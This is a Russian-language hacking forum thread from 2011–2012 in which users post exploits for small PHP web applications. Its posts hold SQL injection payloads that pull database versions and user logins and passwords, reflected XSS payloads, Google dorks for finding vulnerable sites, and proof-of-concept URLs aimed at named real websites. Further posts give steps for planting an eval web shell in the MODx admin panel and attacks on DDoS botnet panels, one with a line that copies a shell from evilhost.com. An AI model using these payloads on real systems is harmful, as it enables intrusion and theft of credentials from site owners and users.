Войти или зарегистрироваться
Выберите удобный способ — аккаунт создастся автоматически.
Или войдите по логину и паролю

31.12.2011, 21:03
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
[B][SIZE="2"][COLOR="Green"]Advanced Poll version )
Эксплуатация:
Код:
http;//site.ltd/poll/demo_3.php?poll_id=1+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+f
Результат:
Код:
Error Number: 1062 Duplicate entry '5.0.77:1' for key 'group_key'
В файл demo_3.php инклудится уязвимый скрипт class_poll.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT poll_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE poll_id=[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND status[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
} else {
return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
Dork: inurl:"popup.php?action=results"
Результатов: примерно 204 000 (0,23 сек.) Развлекатейсь
PoC:
Код:
http://www.bookmine.com/poll/demo_3.php?poll_id=11+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+f
© Ereee
|
|
|

02.01.2012, 16:33
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
[B][SIZE="2"][COLOR="Green"]MDS-JOB version
|
|
|

02.01.2012, 22:38
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
FC4 - Счетчик посетителей вебсайта
Офф сайт:http://linesoft.org/
Описание:SQL inj
Зависимости:mg=off и rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)
Файл: /admin/index.php
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Counter"[/COLOR][COLOR="#007700"])
{
echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$AllCommands[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Counter.Change"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM fc4 WHERE Name=\"[/COLOR][COLOR="#0000BB"]$Name[/COLOR][COLOR="#DD0000"]\""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])
or print([/COLOR][COLOR="#DD0000"]"Ошибка при MySQL запросе: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Авторизации никакой не требуется, там еще есть инъекции в insert,update,delete, эта самая простая
Exploit
Код:
http://127.0.0.1/fc4-0.34/admin/index.php?cmd=Counter&Name=tdsadas"+and+5=4+union+select+1,2,3,4,5,6,7,version()--+
Описание:пассивная xss
Зависимости:rg = on
Файл: admin/counter_form.php
Уязвимый код:
PHP код:
[COLOR="#000000"]
[/COLOR]">
[/COLOR]
из за того что register_globals = on и переменные в скрипте не определены по умолчанию, мы можем поменять их содержание
Exploit
Код:
http://127.0.0.1/fc4-0.34/admin/counter_form.php?cmd=">alert(/xss/)
============================
LS GuestBook v1.0
Офф сайт:http://linesoft.org/
Описание:пассивная xss
Зависимости:rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)
Файл: /guestbook.php
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Пароль[/COLOR][COLOR="#007700"]:
[/COLOR][/COLOR]
$new_pwd обьявляеться в скрипте только если файла pwd.dat нет, а его нет только при 1 заходе
и установки пароля администратора
Exploit
Код:
http://www.bes-chagda.ru/ls_guestbook/guestbook.php?go=auth&new_pwd=1>alert(/xss/)
пароль администратора есть в куках, зашифрован в md5
=====================
LS Logs 1.22
Офф сайт:http://linesoft.org/
Описание:пассивная xss
Зависимости: rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)
Файл: /logsa.php
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[[/COLOR][COLOR="#0000BB"]Фильтр[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]строка в url[/COLOR][COLOR="#007700"]:
[/COLOR][/COLOR]
Exploit
Код:
http://127.0.0.1/LSLogs/example/logsa.php?filter_string=">alert(/xss/)
|
|
|

06.01.2012, 10:50
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Заливка шелла в MODx
Заливка шелла в MODx(тестил на 1.0.5)
1-вариант. Через модуль Doc Manager(можно любой другой или создать свой, юзал Opera):
1) Админка(http://site/manager/) => Сайт => Модули => Doc Manager => В поле "Код модуля(php)" вставляем:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"]])) eval([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"]]));[/COLOR][/COLOR]
Сохраняем.
2) Идем:
Админка => Модули => Doc manager(жмите на него колесиком[mouse3])
Открывается новое окно "Менеджер ресурсов". Скопируте адресную строку(http://site/manager/index.php?a=112&id=1).
Жмем Ctrl+U, в самый верх пишем:
Применяем изменения. Видим огромную ссылку "ЖМИ", жмем и видим phpinfo();. Если не менять исходник, ругается двиг, типа Anti-CSRF.
2-вариант. Банально:
1) Идем:
Админка > Инструменты => Конфигурация => Файл-менеджер
В поле "Разрешенные к загрузке файлы" через запятую добавляем php.
2) Идем:
Админка => Элементы => Управление файлами => Внизу "Обзор" => Льем шелл в любую папку.
3-вариант. Редактируем прямо из админки php-файлы(если права есть):
1) Идем:
Админка => Элементы => Управление файлами
Видим файлы, рядом с доступной для записи файлов есть зеленая галка, жмем. Появится поле, вставляем код, жмем "Сохранить".
Шелл доступен по адресу http://site.ltd/redaktirovanyi_file.php
---
Раскрытие пути(тестил на 1.0.5)
Код:
http://site/assets/cache/siteCache.idx.php
http://site/assets/plugins/managermanager/example.mm_rules.inc.php
http://site/assets/plugins/managermanager/default.mm_rules.inc.php
http://site/assets/plugins/managermanager/mm.inc.php
etc.
|
|
|

11.01.2012, 14:51
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
ArmageddoN DDoS Bots 2.0
SQL Инъекция & Выполнение кода
NEED:magic_quotes_gpc = Off, admin_rights
Уязвимый участок кода:
index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"]);
}
[...] if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]addcommand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]); }
[...][/COLOR][/COLOR]
PoC:
Добавляем новую команду с текстом:
Код:
'; @eval($_REQUEST['cmd']); $a='lol
Exec: /command.php?cmd=phpinfo();
Чтение содержимого файлов (config.php+)
NEED:admin_rights
editheaders.php
Уязвимый участок кода:
[PHP]
[COLOR="#000000"][COLOR="#007700"]&filename=shell.php%00 (при условии magic_quotes_gpc = Off)
?com=Save&data=&filename=shell.php////[4096 слешей]////
[/CODE]
Раскрытие путей
Почти в каждом файле(login.php+)
Уязвимый участок кода:
PoC:
Код:
Cookie: PHPSESSID=!@#$%^&*()_+;
©0x0000ED.COM, Boolean
|
|
|

17.02.2012, 21:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
TopForm CMS офф. сайт
error-based sql
уязвимый параметр issue_id
Код:
issue_id=7'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+
так же уязвимы параметры id и cat
в админке:
/admin.php
sql в post-запросе логина
уязвимый параметр parent
Код:
admin.php?a=issues&parent=11+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+&action=new
так же issue_id, class
PoC:
Код:
http://bzhi.ru/?issue_id=7&cat=2'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+
dork:
Код:
inurl:"index.php?issue_id="
© faza02
|
|
|

04.03.2012, 00:03
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
memento cms 2
memento cms 2
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]issue_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql inj[/COLOR][/COLOR]
админка: admin.php
пароли не хэшированны
хотя возможно это и есть то что в предидущем посте
|
|
|

04.03.2012, 09:15
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Обзор уязвимостей админ панели Dirt Jumper 5
SQL Inj [INSERT]
/index.php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'k'[/COLOR][COLOR="#007700"]];
[...]
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" INSERT INTO `td` (`ip`,`ip2`,`time`)VALUES('[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$ip2[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);
[...]
[/COLOR][/COLOR]
Из инъекции особо ничего не вытянуть, но «обесточить» сервер можно, воспользовавшись тем же BENCHMARK'ом.
Если честно, непонятно, что курили разработчики, но команды хранятся в файле img.gif и для показа ботам файл инклудится.
/index.php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
include[/COLOR][COLOR="#DD0000"]"img.gif"[/COLOR][COLOR="#007700"];
[...]
[/COLOR][/COLOR]
Code Execution
Нужны права админа.
1. Добавляем новую команду:
* Никакой фильтрации нет вообще.
2. POST index.php:
Если знаете параметр $GET_login, который прописывается в конфиге(по дефолту dj5) можно провернуть CSRF результатом которого будет выполнение php кода и xss.
Где http://EVILHOST.COM/EVIL.JS ссылка на ваш зловредный js код.
* Можно еще сразу же средствами js отправить POST запрос на /index.php, и выполнить код, например
Код:
copy("http://evilhost.com/shell.txt", "shell.php"); file_put_contents("img.gif", "");
Тогда шелл автоматически зальется(если прав хватит), а img.gif очистится.
|
|
|

17.05.2012, 13:29
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Уязвимый скрипт: public.php
Уязвимая функция:
display_fns.php
Сообщение от None
global $id_n;
$conn_nt=db_connect("select id_pub, name, link, text
from pub
where id_pub =
$id_n
");
$pub_text=mysql_fetch_array($conn_nt);
$id_pub="$pub_text[id_pub]";
$name="$pub_text[name]";
$text="$pub_text[text]";
$link="$pub_text[link]";
echo "$name";
echo "$link";
echo "";
echo "$text";
}
exploit:
http://bionat.ru/public.php?id_n=-24+union+select+concat_ws(0x3a,user_name,password) ,2,3+from+user
http://bogan.ru/service.php?id_s=27999+union+select+concat_ws(0x3a ,user_name,password),2,3+from+user
http://kalmatron-s.ru/public.php?id_n=-24+union+select+1,concat_ws(0x3a,user_name,passwor d),3+from+user
google:
intext:"Copyright © 2002 - 2012, Интернет-агентство «Боган»"
profit:
Для устранения уязвимости достаточно добавить функцию intval();
code:
Сообщение от None
$conn_nt=db_connect("select id_pub, name, link, text
from pub
where id_pub =
intval($id_n)
");
|
|
|

04.06.2012, 15:42
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами:
8957186
Репутация:
796
|
|
phpComasy 1.0.1
index.php
PHP код:
[COLOR="#000000"] [COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$web[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]get_search_form[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]form_search[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_SEARCH[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]introduction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SEARCH_STRING[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$return[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]search_result[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_SEARCH[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]introduction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// Security check
[/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"&"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"?"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'searchtext'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]umlaut[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"]) >=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$search_query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__page_language` WHERE language='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]language[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_current_language[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"' AND (LOWER(title) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(introduction) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(content) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(title) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(introduction) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%' OR LOWER(content) LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$searchtext_umlaut[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%');"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
example:
Код:
http://www.ssk66.de/?action=search_result
POST: searchtext=sad') or (select count(*)from information_schema.tables group by concat((version()),floor(rand(0)*2)))or('
shell upload:
classes/class.file_manager.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]file_upload[/COLOR][COLOR="#007700"]() {
if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]check_security[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]check_access_for_area[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'filemanager'[/COLOR][COLOR="#007700"])) {
if ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0644[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//chmod fixchmod ($_FILES['file']['tmp_name'],0644); //chmod fix
[/COLOR][COLOR="#0000BB"]$new_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]special_chars_to_html[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]));
